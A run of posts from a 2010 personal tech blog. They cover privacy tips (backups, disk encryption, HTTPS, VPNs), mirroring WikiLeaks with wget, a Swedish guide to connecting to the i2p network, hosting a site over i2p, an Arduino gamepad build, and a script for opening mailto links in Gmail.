<p>There are millions of ways that you can lose your files. Your hard drive can simply break, you might accidentally delete something, it might be stolen (big risk with a laptop), your house might burn down or the police might <a href="http://www.satmaran.com/2010/september/en-fildelares-skrammande-historia.html">steal it</a>.</p>
<p>Backup your files, and do it regularly! Preferably back it up to a location outside your house (so it won&#8217;t get stolen or burnt in case of a robbery or a fire). <br />
There are several ways to do this, either you ask a friend to set up an <span class="caps">FTP</span> server on her computer to which you could upload your files (tip: store them encrypted so she can&#8217;t see your private files). In return for the favor you can offer her to backup files on your hard drive, or you could give her a disk to store your files on. <br />
If this is to much work for you, you can try out some of the cloud storage services. Ubuntu has a built in service called <a href="https://one.ubuntu.com/">Ubuntu One</a>. Another one is <a href="https://www.dropbox.com/referrals/NTUyMzkzMzg5?src=global0">Dropbox</a>. <br />
These services are free if you only need a few GB of data. In case you need more you need to pay a monthly fee.</p>
<h2><a name="#encrypt">Encrypt your hard drives!</a></h2>
<p>What most people think the log-in screen on your computer does, encryption really does. It is easy to get past the login screen on all normal operating systems. Even if someone is unable to log in to your computer they could just mount your hard drive on their own computer and see all your files. <br />
So if your computer is stolen or otherwise compromised it is always good to have the files encrypted. Preferably the whole hard drive.<br />
There are several ways to do this, Ubuntu offers to encrypt your hard drives when you install it. For other operating systems there are a lot of alternatives. One example is <a href="http://www.truecrypt.org/">TrueCrypt</a>.</p>
<h2><a name="#https">Use encrypted connections when you are on a network</a></h2>
<p>Whenever you are using a network, and especially if you are using a wireless connection you should do your best to use encrypted connections. It is very easy to “listen” to wireless connections and steal information from you (like your Facebook password, credit card number, your chat conversations and so on). <br />
The easiest way to avoid having your information stolen is to use the “https://”- address instead of the “http://”- address to the website you are logging in to. There is a handy &quot;Firefox Plugin”:https://www.eff.org/https-everywhere to help you with this! <br />
To make sure all of your network traffic is encrypted when you are using a wireless network you can use a <span class="caps">VPN</span>, Virtual Private Network. This will tell your computer to send all information that is leaving your computer to first go to another computer that you trust and from that computer travel to the website/chat-server you have requested. You can either install a <span class="caps">VPN</span> at home, but that might get a bit complicated, or you can rent the service from a <span class="caps">VPN</span> provider. There are a lot of alternatives, examples are <a href="https://www.anonine.com/">Anonine</a> and <a href="https://www.relakks.com/">Relakks</a> (both are Swedish). <br />
A <span class="caps">VPN</span> might also help to protect your identity on the web!</p>Support Our Troops2010-12-05T00:00:00+01:00http://blog.kejsarmakten.se/all/personal/2010/12/05/Mirror-wikileaks<h2>Support Our Troops</h2>
<p class="publish_date">05 Dec 2010<br />
<pre id="terminal"><br />
&#8220;I can&#8217;t belive we are sitting here and sharing information on <br />what IP-adresses are stil not censored.&#8221; &#8211; @kyrah<br />
</pre></p>
<p>This is how you mirror Wikileaks and help supporting Freedom of Speech.</p>
<p>On a Linux/Unix machine write the command &#8220;wget -mirror 46.59.1.2&#8221; and you will copy the website to your local machine. It is not guarranteed that the ip will work, and if it doesn&#8217;t check out this list of wikileak mirrors to get a new one <a href="http://cablegate.failar.nu/mirrorlist.html" target="_blank">failar.nu/mirrorlist.html</a> or log in to irc.telecomix.org and the channel #telekompaketet and ask them for an IP-adress.</p>
<p><strong>Update</strong> Wikileaks just put up a guide on how to help mirroring their website <a href="http://46.59.1.2/mass-mirror.html" target="_blank">here</a>.</p>Hur man gör för att surfa på i2p hemsidor2010-12-03T00:00:00+01:00http://blog.kejsarmakten.se/all/software/2010/12/03/connecting-to-i2p<h2>Hur man gör för att surfa på i2p hemsidor</h2>
<p class="publish_date">3 Dec 2010</p>
<p>A guide in Swedish on how to connect to the i2p Darknet. <br />
I&#8217;ve decided to write this in Swedish since I guess there are alot of tutorials for this on English already. If you are unable to find one then try using Google Translate.</p> <p><br /></p>
<p>Har du sprungit på hemsidor som slutar på &#8220;.i2p&#8221;, som t.ex. <a href="http://forum.i2p/" target="_blank">http://forum.i2p/</a>? <br />
Dessa hemsidor går inte att öppna normalt i en webläsare och det beror på att de är såkallade &#8220;eepSites&#8221;. Dessa sidorna ligger inne i ett &#8220;Darknet&#8221; som möjliggör för den som lägger upp hemsidan och för de som besöker hemsidan att vara anonyma. <br />
Om du vill besöka en hemsida i i2p eller lägga upp en anonym hemsida så kan du följa stegen nedan. Märk dock att jag kör Linux distributionen Ubuntu 10.10 och om du kör något annat Operativsystem (som t.ex Apples OS X eller Windows) så kan det se lite annorlunda ut men jag försöker hålla det så allmänt som jag kan. </p>
<p>Här är en video där jag utför alla stegen som står nedanför på en nyinstallerad Ubuntu maskin (utom java installationen).<br />
För tillfället är den helt oklippt då jag inte har haft tid till det ännu och då jag kör den i en virtuell maskin så går vissa nedladdningar ganska slött. Spola gärna förbi dem tills jag har fått tid att klippa till filmen och ladda upp den här ordentligt.</p>
<p><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/q4owyd_CaGc?hl=sv&fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/q4owyd_CaGc?hl=sv&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object></p>
<ul>
<li>Det första steget är att se till att du har Java installerat på din dator. Det är lätt att göra på de flesta operativsystem. Surfa in på den <a href="http://www.java.com/en/download/installed.jsp?detect=jre&try=1" target="_blank">här hemsidan</a> och testa om du har det eller inte. Om du saknar det så kan du lätt installera det från hemsidan.</li>
<li>Det andra steget är att surfa in på i2p-projektets egen hemsida och ladda ner den senaste versionen av i2p-installeringsfilen. Hemsidan hittar ni <a href="http://www.i2p2.de/download" target="_blank">här</a> och filen ni skall ladda ner ligger under rubriken &#8220;Clean installer:&#8221; och &#8220;Graphical installer:&#8221; Filen heter något i stil med &#8220;i2pinstall_*.<strong>.</strong>.exe&#8221; där &#8220;*&#8221; versions nummer.</li>
<li>Nu skiljer det sig lite mellan operativsystemen. Om du kör Windows kan du troligen bara trycka på filen för att få upp en installationsruta (Ni kan sen hoppa direkt till nästa punkt). Kör du OS X eller Linux som jag så får du öppna en Terminal och navigera dig till mappen där filen ligger med hjälp av kommandona &#8220;ls&#8221; (se vad som finns i mappen) och &#8220;cd dir&#8221; (gå till en mapp) där &#8220;dir&#8221; är mappens namn. När du väl är i samma mapp som installationsfilen så skriv in commandot <pre name="code" class="terminal">$ java -jar i2pinstall_*.<strong>.</strong>.exe</pre> där du får byta ut &#8220;*&#8221;-tecknen mot versionsnumret på din fil. </li>
<li>När du har utfört ovanstående steg öppnas en lättförstålig ruta som låter dig välja vilket språk du vill installera med samt vilken mapp du vill installera i. Följ de angivna stegen i rutan tills den säger att du är klar. </li>
<li>Nu är det dags att starta din i2p-router. Det är den som låter dig ansluta till de anonyma i2p sidorna. <br />
Nu vet jag inte hur du gör detta på en Windowsmaskin (om någon som läser detta vet hur man gör får ni gärna berätta så jag kan uppdatera guiden), men antagligen skall ni klicka på filen &#8220;i2prouter&#8221; i er installationsmapp. <br />
Linux och OS X användare kan göra såhär: Öppna åter igen en terminal och navigera er in till mappen som ni angav som installationmapp, på Ubuntu så är standardmappen &#8220;/home/user/i2p/&#8221;. Väl inne i mappen så skriver ni <pre name="code" class="terminal">$ ./i2prouter start</pre> och detta bör resultera i en output som liknar <pre name="code" class="terminal">$ Starting i2p Service&#8230; </pre></li>
<li>Om allt har gått bra i föregående steg skall nu en webläsare öppnas som visar din i2p-inställningspanel. Ha lite tålamod för det kan ta en liten stund. Här kan du sköta alla dina inställningar och läsa mer om hur du gör för att chatta anonymt och säkert, lägga upp anonyma hemsidor och mycket mera. Den här sidan har många små inställningar att göra men jag tänkte inte gå igenom dem just nu för all information finns där på lättförstålig svenska. Man behöver inte heller röra inställningarna för att det skall fungera normalt heller. <br />
<li>Nu för att kunna surfa på i2p-hemsidorna så måste vi öppna en webbläsare. Vi måste få webbläsaren att använda adressen &#8220;localhost&#8221; och porten &#8220;4444&#8221; som proxy för att koppla upp sig på internet. Detta kanske låter lite avancerat men det är förvånansvärt lätt i de flesta moderna webbläsare och görs oftast i inställningarna. <br />
För att göra detta så lätt som möjligt föreslår jag att ni använder webbläsaren Firefox (som ni kan hämta <a href="http://www.mozilla.com/firefox/" target="_blank">här</a>). För Firefox har nämligen en väldigt smidig &#8220;addon&#8221;, tillägg, som gör att man slipper gå in och ändra proxyinställningarna varje gång man vill besöka en i2p-hemsida.<br />
Tillägget heter FoxyProxy och går att installera genom att man öppnar Firefox och trycker på &#8220;Verktyg&#8221; i menyraden och sedan på &#8220;Tilläg&#8221;. Sök, i sökrutan högst upp, på &#8220;FoxyProxy&#8221; och installera sedan &#8220;FoxyProxy Standard&#8221;. Detta tar en liten stund och sedan blir du ombedd att starta om Firefox. Gör det! :)<br/>
När firefox startar igen har det dykt upp en liten ikon längst ner i högra hörnet. Tryck på den. <br />
I rutan som öppnas trycker ställer du nu på &#8220;Lägg till ny proxy&#8221;. Det kommer nu öppnas ytterligare en ruta. I den stora textrutan som det står &#8220;Host eller ipadress&#8221; brevid så skriver du in &#8220;localhost&#8221;. I den mindre rutan som det står &#8220;Port&#8221; på så skriver du in &#8220;4444&#8221;.<br /> Nästa steg är att välja fliken &#8220;<span class="caps">URL</span>-mönster&#8221;. Tryck knappen &#8220;Lägg till nytt mönster&#8221;. Döp mönstret till &#8220;i2p&#8221; och i &#8220;<span class="caps">URL</span> eller <span class="caps">URL</span>-mönster&#8221;-rutan så skriver du in "*.i2p*". Det betyder att FoxyProxy endast skall köra sidor som innehåller texten &#8220;.i2p&#8221; genom i2p-nätverket. Tryck sedan &#8220;Ok&#8221; för att spara ditt mönster och tryck sedan &#8220;Ok&#8221; för att spara din proxy.<br /> <br />
Sista steget är nu att ändra högst upp i rutan från &#8220;Stäng av FoxyProx för användning&#8221; till &#8220;Använd Proxy enligt fördefinierade mönster och prioritet&#8221;.</li>
<li>Nu är det dags för att se om alltid har fungerat som det skall! Testa att gå in på den här länken: <a href="http://forum.i2p" target="_target">forum.i2p</a>. Fungerar det? Grattis du kan nu surfa till annonyma i2p-sidor (eepSites)! </li>
</ul>
<p>Varför jag rekommenderar FoxyProxy är för att man inte skall behöva ändra för hand varje gång man vill byta mellan att surfa över i2p och surfa direkt över sin internetuppkoppling. Det finns säkert massor av alternativ som liknar FoxyProxy till både Firefox och alla andra webbläsare men jag rekommendera FoxyProxy just för att jag har testat det och vet att det fungerar väldigt bra. <br />
Värt att nämna är också att man kan surfa genom i2p till vanliga hemsidor med, som t.ex. www.google.se och får även då sin IP-adress dold (<span class="caps">MEN</span> DÅ MÅSTE NI ÄNDRA I <span class="caps">FOXYPROXY</span> SÅ NI <span class="caps">ALLTID</span> ANVÄNDER ER &#8220;localhost&#8221; <span class="caps">PORT</span> &#8220;4444&#8221; <span class="caps">PROXY</span>). Tyvärr går detta väldigt långsamt då &#8220;utvägarna&#8221; ur i2p-nätverket är få. I2p är inte tänkt att ha &#8220;utvägar&#8221; egentligen så om du egentligen vill surfa på det &#8220;vanliga&#8221; nätet och vill vara annonym kan du t.ex. testa <a href="https://www.torproject.org/" target="_blank"><span class="caps">TOR</span></a> som är en liknande tjänst men som mer riktar sig till att annonymisera ip-adresser på det vanliga nätet. Hur man ansluter sig till <span class="caps">TOR</span> är en annan historia och jag kanske skriver en guide till det en annan dag. </p>
<p>Många väljer att använda två webläsare, en där de surfar genom i2p och en där de surfar på vanliga webben. Detta beror på att många addons och script kan läcka information om dig. Därför är det säkrast att använda två webläsare om man är mån om att vara anonym.</p>
<p>Nu när i2p fungerar bör ni hoppa tillbaka till er <a href="http://127.0.0.1:7657/index.jsp" target="_blank">inställningspanel</a> och se så att allt fungerar bra. Klicka runt lite och se hur saker fungerar. Om du inte har vidarbefodra en port i din router till i2p kan det t.ex stå en varning. Följ bara instruktionerna i felmedelandena så löser sig allt sådant.</p>svenskarollspel.se added i2p and https support2010-11-28T00:00:00+01:00http://blog.kejsarmakten.se/all/software/2010/11/28/Hosting-on-i2p<h2>svenskarollspel.se added i2p and https support</h2>
<p class="publish_date">28 Nov 2010</p>
<p> As a hobby project and as a favor to the swedish roleplaying industri I am hosting the website <a href="https://svenskarollspel.se" target="_blank">svenskarollspel.se</a>. The website targets people who are interested to see what Swedish RPGs are available on the market. It is meant as a simple place to start if you are new to roleplaying games. <br />
The website is still under heavy construction but I am writing about it here because I just added <span class="caps">HTTPS</span> and i2p support.</p>
<p>The <span class="caps">SSL</span>- certificate is signed with by <a href="https://startssll.com" target="_blank">startssl</a> and it is a free service!</p>
<p>I have also started to host the site on the <a href="http://i2p2.de" target="_blank">i2p darknet</a>. This might not be something that is needed for an <span class="caps">RPG</span> website but I did it more as a statement as I am a strong believer in the right to anonymity and freedom of speech</p>
<p>I hope to be able to provide the same services for this blog as well within a near future.</p>
<p>This blogpost will be extended later, because right now I have a Realtime programming project to finish.</p> Built an arduino-snes-usb-handcontroller2010-11-09T00:00:00+01:00http://blog.kejsarmakten.se/all/software/2010/11/09/arduino-sings<h2>Built an arduino-snes-usb-handcontroller</h2>
<p class="publish_date">09 Nov 2010</p>
<p>Today I finished moulding my Arduino &#8220;snes&#8221;-handcontroller (usb).</p>
<p><img src="/images/arduino.jpg" alt="Moulded and done"/></p>
<p>I used mostly parts from <a href="http://www.sparkfun.com/commerce/tutorial_info.php?tutorials_id=171" target="_blank">sparkfun</a>, like the thumstick, and the red board. The microcontroller controlling everything is an <a href="http://www.arduino.cc/" target="_blank">Arduino Duemilanove</a>. The rest of the components (mostly buttons) I scrambled together from different locations.<br />
<br />
<p>My plan is to write some little arcade game to control with it, but as I just finished the assembly I just tried out some of the example code on SparkFuns website. Here is my microcontroller singing &#8220;Twinkle, twinkle little star&#8221; in different speeds and intensities (in html 5 so not sure if it is going to work for all of you. In case it doesn&#8217;t work here is a direct link to this rather unspectacular <a href="http://blog.kejsarmakten.se/images/arduinosings.ogg" target="_blank">film</a>).</p>Moving in2010-11-09T00:00:00+01:00http://blog.kejsarmakten.se/all/personal/2010/11/09/Moving-in<h2>Moving in</h2>
<p class="publish_date">14 Jul 2010</p>
<p>I just decided to move from my wordpress blog over at <a href="http://development.kejsarmakten.se" target="_blank">development.kejsarmakten.se</a> to a more personal blog less connected to the Kejsarmakten project. This blog is hosted with the help of <a href="https://github.com/mojombo/jekyll" target="_blank"> Jekyll</a>. The current design of this site is merly temporary. I will also try to migrate parts of my old blog here in due time.</p>How to open mailto: with gmail in chrome2010-06-19T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2010/06/19/open-mailto-with-gmail-in-chrome<h2>How to open mailto: with gmail in chrome</h2>
<p class="publish_date">19 Jun 2010</p>
<p>I use Gmail as my main e-mail client so I grew rather tired of having Thunderbird (or Evolution Mail) open every time I press a mailto-tag in Chrome on my Ubuntu (10.04 <span class="caps">LTS</span>) machine. This is how you get Gmail instead of your standard email client.<br />
First you need to open a terminal and write</p>
<pre class="terminal">
$ gnome-default-applications-properties
</pre>
<p>In the newly opened window set the email command to<br />
<pre class="terminal">gnome-open https://mail.google.com/mail/?extsrc=mailto&amp;url=%s</pre></p>
<p>Do not forget to set Chrome as your default browser.</p>
<p>&#8212;</p>
<p>You can get the email to be automatically filled out by for you if you change the email command in gnome-default-applications-properties to<br />
<pre class="terminal">$ sh /home/user/gmailinchrome.sh %s</pre><br />
<p> (where “user” should be replaced by your username). Then you have to put a shell-script in your /home folder. This is done by creating a file named gmailinchrome.sh in your home folder and copying the following text into the file.</p><br />
<pre class="terminal">
#!/bin/sh
/opt/google/chrome/google-chrome <br />“https://mail.google.com/mail?view=cm&tf=0&to=`echo $1 | sed ‘s/mailto://’`”
</pre>
</p>